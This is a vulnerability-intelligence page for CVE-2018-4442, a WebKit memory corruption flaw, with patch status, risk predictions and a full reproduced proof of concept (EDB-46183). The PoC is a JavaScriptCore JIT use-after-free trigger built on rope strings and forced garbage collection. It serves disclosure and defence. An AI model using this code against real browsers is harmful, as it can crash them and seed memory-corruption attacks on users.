VIR Vulnerability Intelligence Relay

CVE-2018-4442

unknown
Published — · Modified —
💬 Discuss on Community ✚ Propose mitigation
CVSS v3
CVSS v4 NEW
not yet in upstream
VIR risk
1.0

Description

A memory corruption issue was addressed with improved memory handling. This issue affected versions prior to iOS 12.1.1, tvOS 12.1.1, watchOS 5.1.2, Safari 12.0.2, iTunes 12.9.2 for Windows, iCloud for Windows 7.9.

Predictions

Exploit likelihood
55%
Patch ETA

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-46183 dos multiple verified text · 1 KB
Google Security Research · 2019-01-16

WebKit JSC JIT - GetIndexedPropertyStorage Use-After-Free

text exploit Source: Exploit-DB 
/*
The doesGC function simply takes a node, and tells if it might cause a garbage collection. This function is used to determine whether to insert write barriers. But it's missing GetIndexedPropertyStorage that can cause a garbage collection via rope strings. As a result, it can lead to UaF.

PoC:
*/

function gc() {
    for (let i = 0; i < 10; i++) {
        new ArrayBuffer(1024 * 1024 * 10);
    }
}

function opt(arr) {
    let r = /a/;
    let o = {};

    arr[0].charAt(0);
    arr[1].charAt(0);
    arr[2].charAt(0);
    arr[3].charAt(0);
    arr[4].charAt(0);
    arr[5].charAt(0);
    arr[6].charAt(0);
    arr[7].charAt(0);
    arr[8].charAt(0);
    arr[8].charAt(0);
    arr[9].charAt(0);

    o.x = 'a'.match(r);

    return o;
}

function main() {
    for (let i = 0; i < 10000; i++) {
        opt(['a' + i, 'b' + i, 'c' + i, 'd' + i, 'e' + i, 'f' + i, 'g' + i, 'h' + i, 'i' + i, 'j' + i]);
    }

    let a = 'a'.repeat(1024 * 1024 * 2);
    let b = 'a'.repeat(1024 * 1024 * 2);

    let arr = [];
    for (let i = 0; i < 10; i++) {
        arr[i] = a + b;
    }

    gc();

    let o = opt(arr);

    gc();

    let tmp = [1234];

    print(o.x);  // 1234
}

main();

OS impact
suse SUSE Affected 1 release
VersionStatusFixed in
Affected
debian Debian Fixed 5 releases
VersionStatusFixed in
trixie Fixed 2.22.3-1
sid Fixed 2.22.3-1
forky Fixed 2.22.3-1
bullseye Fixed 2.22.3-1
bookworm Fixed 2.22.3-1

References

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.